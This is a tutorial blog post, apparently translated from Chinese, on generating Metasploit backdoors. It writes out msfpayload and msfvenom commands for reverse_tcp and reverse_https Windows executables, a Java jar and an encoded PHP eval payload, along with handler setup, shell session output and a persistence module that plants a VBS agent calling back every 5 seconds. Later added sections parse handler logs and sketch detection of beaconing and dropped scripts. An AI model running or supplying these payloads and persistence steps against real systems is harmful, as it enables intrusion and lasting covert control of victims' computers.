Metasploit executable backdoors
2021/6/20 22:26:25
This article introduces Metasploit executable backdoors. It has some reference value for solving programming problems, so programmers who need it can follow along with the editor and learn together!
Contents
msfpayload as shellcode
persistence
It can generate backdoors for Linux, Windows, PHP, ASP, JSP and more.
msfpayload as shellcode
List all available payloads; there are currently 248 of them:
root@kali:/home/brk# msfpayload -l
It can generate many kinds of payloads.
Let's start with a simple one.
A normal Windows backdoor
This one uses windows/meterpreter/reverse_tcp:
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
msfencode -b '' -t exe -o /var/www/meterpreter.exe
After generating it and getting the target to run it, we need to listen on our side to receive the shell:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit
[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2020-03-21 23:26:58 +0800
meterpreter >
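The handler output above has a fixed shape that is easy to parse. The following Python script is an added example, not code from the original post or from the Metasploit project; it turns a console transcript like the ones in this post into structured session open/close records, which is handy for keeping a record of a lab exercise. The sample transcript is constructed from the lines shown above, and the function and field names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the shape of the msfconsole output shown above; it is
# assembled here for the parser and is not a real capture.
SAMPLE_OUTPUT = """\
msf exploit(handler) > exploit
[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2020-03-21 23:26:58 +0800
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2020-03-21 23:40:06 +0800
msf exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
"""

# "Meterpreter session N opened (LHOST:LPORT -> RHOST:RPORT) at <timestamp>"
OPENED_RE = re.compile(
    r"Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})"
)
# "Meterpreter session N closed."
CLOSED_RE = re.compile(r"Meterpreter session (?P<sid>\d+) closed")


@dataclass
class SessionEvent:
    sid: int
    event: str  # "opened" or "closed"
    lhost: Optional[str] = None
    lport: Optional[int] = None
    rhost: Optional[str] = None
    rport: Optional[int] = None
    ts: Optional[str] = None


def parse_handler_output(text: str) -> List[SessionEvent]:
    """Turn handler console output into a list of session open/close events."""
    events: List[SessionEvent] = []
    for line in text.splitlines():
        m = OPENED_RE.search(line)
        if m:
            events.append(SessionEvent(
                sid=int(m["sid"]), event="opened",
                lhost=m["lhost"], lport=int(m["lport"]),
                rhost=m["rhost"], rport=int(m["rport"]), ts=m["ts"],
            ))
            continue
        m = CLOSED_RE.search(line)
        if m:
            events.append(SessionEvent(sid=int(m["sid"]), event="closed"))
    return events


def open_sessions(events: List[SessionEvent]) -> List[int]:
    """Session ids that were opened and never closed, in order of opening."""
    opened: List[int] = []
    for e in events:
        if e.event == "opened" and e.sid not in opened:
            opened.append(e.sid)
        elif e.event == "closed" and e.sid in opened:
            opened.remove(e.sid)
    return opened


def callback_hosts(events: List[SessionEvent]) -> List[str]:
    """Distinct remote hosts that connected back, in first-seen order."""
    seen: List[str] = []
    for e in events:
        if e.event == "opened" and e.rhost not in seen:
            seen.append(e.rhost)
    return seen


if __name__ == "__main__":
    evs = parse_handler_output(SAMPLE_OUTPUT)
    for e in evs:
        print(e)
    print("still open:", open_sessions(evs))
    print("hosts that called back:", callback_hosts(evs))
```

Feeding it a saved msfconsole log (for example one written with spool) gives a per-session record of which lab host called back, on which port, and when, without copying the lines out by hand.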
Others (php, asp, jsp, dll)
Pick the msfpayload name you want and generate it; you know the rest. For example:
Dll:
php:
msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));
JAVA:
./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
Abnormal Windows backdoors
Where there are normal ones there are of course abnormal ones, for example reverse_https and reverse_http.
As everyone knows, this thing goes straight through firewalls. If the connection is unexpectedly interrupted, it reconnects and we carry on, just like Gray Pigeon (灰鸽子). The default is 5 minutes; set the SessionExpirationTimeout option to 0 and the connection never expires.
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Now let's run it.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 1111
LPORT => 1111
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2020-03-21 23:40:06 +0800
It worked. I clicked it a couple more times and got two shells; now let's delete the shell sessions:
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)

msf exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) >
Keep listening:
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
And we get a shell again.
persistence
This is one of the post-exploitation modules; the prerequisite is that you already have a shell session. It creates a persistent backdoor that starts as a system service.
First connect to the shell and look at the help:
msf exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A   Automatically start a matching multi/handler to connect to the agent
    -L   Location in target host where to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S   Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U   Automatically start the agent when the User logs on
    -X   Automatically start the agent when the system boots
    -h   This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on the remote host where Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

meterpreter >
Now let's run it:
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >
It was installed under c:\windows and tries to connect back to port 1234 every 5 seconds; our machine is 5.5.5.1.
That is all for this article on Metasploit executable backdoors. We hope the articles we recommend are helpful to you, and we hope you keep supporting 为之网!
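From the defender's side, the two observable traces of what this section and the reverse_https section above describe are a host connecting to the same destination port at a fixed interval (every 5 seconds here, and the repeated reconnects to 5.5.5.1:1111 after each session was killed above) and a script with a random-looking name written directly into c:\windows. The following Python script is an added example, not code from the original post or from Metasploit; it runs these two heuristics over a constructed connection log and a constructed file listing. The log line format, the jitter threshold, the name pattern and all function names are assumptions of this example. The help text above says the default write location is %TEMP%, so in practice that directory would be added to watch_dirs as well.

```python
import ntpath
import re
import statistics
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed outbound-connection log in a generic firewall/flow-log shape.
# The 5.5.5.x addresses and port 1234 mirror the lab above; everything else
# is made up for this example and is not a real capture.
LOG_LINES = [
    "2020-03-21 23:45:57.000 5.5.5.3 -> 5.5.5.1:1234",
    "2020-03-21 23:46:02.000 5.5.5.3 -> 5.5.5.1:1234",
    "2020-03-21 23:46:07.200 5.5.5.3 -> 5.5.5.1:1234",
    "2020-03-21 23:46:12.100 5.5.5.3 -> 5.5.5.1:1234",
    "2020-03-21 23:46:17.200 5.5.5.3 -> 5.5.5.1:1234",
    "2020-03-21 23:46:22.200 5.5.5.3 -> 5.5.5.1:1234",
    "2020-03-21 23:46:27.000 5.5.5.3 -> 5.5.5.1:1234",
    "2020-03-21 23:46:32.100 5.5.5.3 -> 5.5.5.1:1234",
    # another host with irregular, browsing-like gaps (should not be flagged)
    "2020-03-21 23:45:00.000 5.5.5.7 -> 203.0.113.10:443",
    "2020-03-21 23:45:30.000 5.5.5.7 -> 203.0.113.10:443",
    "2020-03-21 23:45:31.000 5.5.5.7 -> 203.0.113.10:443",
    "2020-03-21 23:47:00.000 5.5.5.7 -> 203.0.113.10:443",
    "2020-03-21 23:51:40.000 5.5.5.7 -> 203.0.113.10:443",
    "2020-03-21 23:51:41.000 5.5.5.7 -> 203.0.113.10:443",
]

# Constructed file listing; only the first entry imitates the name pattern above.
SAMPLE_PATHS = [
    "C:\\Windows\\FBEzRzQYpXKFg.vbs",
    "C:\\Windows\\notepad.exe",
    "C:\\Windows\\win.ini",
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "C:\\Windows\\Temp\\aBcDeFgHiJkL.vbs",
]

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")


def find_beacons(lines: List[str], min_connections: int = 6, max_jitter: float = 1.0) -> List[dict]:
    """Flag (src, dst, dport) triples whose gaps between connections are nearly constant."""
    by_flow: Dict[Tuple[str, str, int], List[datetime]] = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        key = (m["src"], m["dst"], int(m["dport"]))
        by_flow.setdefault(key, []).append(datetime.fromisoformat(m["ts"]))
    alerts = []
    for (src, dst, dport), stamps in by_flow.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # a fixed reconnect interval shows up as a very low spread of the gaps
        if statistics.pstdev(gaps) <= max_jitter:
            alerts.append({"src": src, "dst": dst, "dport": dport,
                           "connections": len(stamps),
                           "interval": round(statistics.median(gaps), 1)})
    return alerts


def suspicious_scripts(paths: List[str], watch_dirs=("c:\\windows",)) -> List[str]:
    """Flag .vbs files sitting directly in a watched directory whose name is a long
    run of mixed-case letters (heuristic modelled on the file name shown above)."""
    watched = {ntpath.normcase(d).rstrip("\\") for d in watch_dirs}
    hits = []
    for p in paths:
        parent, name = ntpath.split(p)
        stem, ext = ntpath.splitext(name)
        if ntpath.normcase(parent).rstrip("\\") not in watched:
            continue
        if ext.lower() != ".vbs":
            continue
        if re.fullmatch(r"[A-Za-z]{10,}", stem) and stem != stem.lower() and stem != stem.upper():
            hits.append(p)
    return hits


if __name__ == "__main__":
    for a in find_beacons(LOG_LINES):
        print("beacon:", a)
    for h in suspicious_scripts(SAMPLE_PATHS):
        print("suspicious script:", h)
```

The interval check is deliberately simple: a standard deviation of the gaps below one second across six or more connections. Real beacons add jitter and real networks drop connections, so in production the threshold and the minimum count are tuned per environment, and the file-name check is a starting point to confirm with the file's creation time and the process that wrote it.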